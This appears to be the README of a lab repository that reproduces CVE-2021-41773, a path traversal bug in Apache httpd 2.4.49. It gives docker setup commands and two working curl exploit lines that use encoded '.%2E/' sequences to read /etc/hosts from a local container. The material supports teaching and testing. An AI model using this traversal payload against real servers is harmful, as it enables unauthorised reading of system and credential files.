CVE-2021-41773 (Apache httpd only 2.4.49)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/masahiro331/CVE-2021-41773.git
$ cd CVE-2021-41773
$ docker build -t cve-2021-41773 .
$ docker run -d -p 8080:80 cve-2021-41773

Exploit

# This vulnerability affects the use of Alias.
$ curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
$ curl http://localhost:8080/webpath/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts

Reference

Fixed commit Vendor advisory